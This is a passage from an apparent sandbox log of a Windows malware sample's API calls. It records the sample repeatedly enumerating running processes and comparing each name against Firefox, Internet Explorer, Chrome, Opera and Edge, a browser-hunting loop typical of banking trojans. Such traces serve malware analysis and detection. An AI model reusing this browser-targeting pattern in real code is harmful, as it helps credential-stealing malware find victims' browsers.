th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0175.882] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0175.882] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0175.882] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0175.882] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0175.882] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.882] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0175.883] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0175.883] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0175.883] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0175.883] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0175.883] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.883] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0175.883] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0175.883] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0175.883] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0175.883] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0175.883] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.883] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0175.884] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0175.884] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0175.884] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0175.884] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0175.884] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.884] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0175.884] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0175.884] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0175.884] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0175.885] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0175.885] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.885] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0175.885] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0175.885] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0175.885] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0175.885] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0175.885] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.885] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.886] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0175.886] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0175.886] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0175.886] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0175.886] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.886] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0175.886] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0175.886] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0175.886] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0175.886] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0175.886] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.886] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.887] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0175.887] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0175.887] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0175.887] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0175.887] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.887] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0175.887] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0175.887] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0175.887] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0175.887] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0175.888] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.888] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.888] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0175.888] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0175.888] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0175.888] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0175.888] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.888] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0175.889] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0175.889] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0175.889] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0175.889] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0175.889] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.889] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0175.889] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0175.889] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0175.889] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0175.889] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0175.889] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.889] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0175.890] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0175.890] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0175.890] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0175.890] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0175.890] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.890] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0175.890] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0175.890] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0175.890] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0175.891] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0175.891] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.891] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0175.891] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0175.891] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0175.891] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0175.891] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0175.891] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.891] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0175.892] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0175.892] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0175.892] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0175.892] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0175.892] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.892] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0175.892] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0175.892] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0175.892] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0175.892] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0175.892] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.892] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0175.893] lstrcmpiA (lpString1="regsvr32.exe", lpString2="firefox.exe") returned 1 [0175.893] lstrcmpiA (lpString1="regsvr32.exe", lpString2="iexplore.exe") returned 1 [0175.893] lstrcmpiA (lpString1="regsvr32.exe", lpString2="chrome.exe") returned 1 [0175.893] lstrcmpiA (lpString1="regsvr32.exe", lpString2="opera.exe") returned 1 [0175.893] lstrcmpiA (lpString1="regsvr32.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.893] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0175.894] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0175.894] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0175.894] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0175.894] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0175.894] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0175.894] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0175.894] CloseHandle (hObject=0xe8) returned 1 [0175.894] Sleep (dwMilliseconds=0x3e8) [0176.928] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0176.930] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.931] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0176.931] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0176.931] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0176.931] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0176.931] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0176.931] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0176.931] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0176.931] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0176.931] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0176.931] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0176.931] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0176.931] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0176.932] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0176.932] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0176.932] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0176.932] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0176.932] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.932] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0176.932] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0176.932] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0176.932] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0176.932] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0176.932] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0176.932] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0176.933] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0176.933] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0176.933] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0176.933] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0176.933] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.933] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0176.934] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0176.934] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0176.934] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0176.934] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0176.934] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0176.934] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0176.934] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0176.934] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0176.934] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0176.934] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0176.934] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.934] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0176.935] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0176.935] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0176.935] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0176.935] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0176.935] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.935] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0176.935] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0176.935] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0176.935] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0176.935] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0176.935] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0176.935] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0176.936] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0176.936] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0176.936] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0176.936] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0176.936] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0176.936] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.937] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0176.937] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0176.937] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0176.937] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0176.937] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.937] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.937] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0176.937] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0176.937] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0176.937] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0176.937] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.937] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.938] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0176.938] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0176.938] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0176.938] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0176.938] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.938] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.938] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0176.938] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0176.938] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0176.938] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0176.938] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.938] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.939] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0176.939] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0176.939] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0176.939] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0176.939] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.939] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0176.940] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0176.940] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0176.940] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0176.940] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0176.940] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0176.940] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.940] lstrcmpiA (lpString1="svchost.exe", 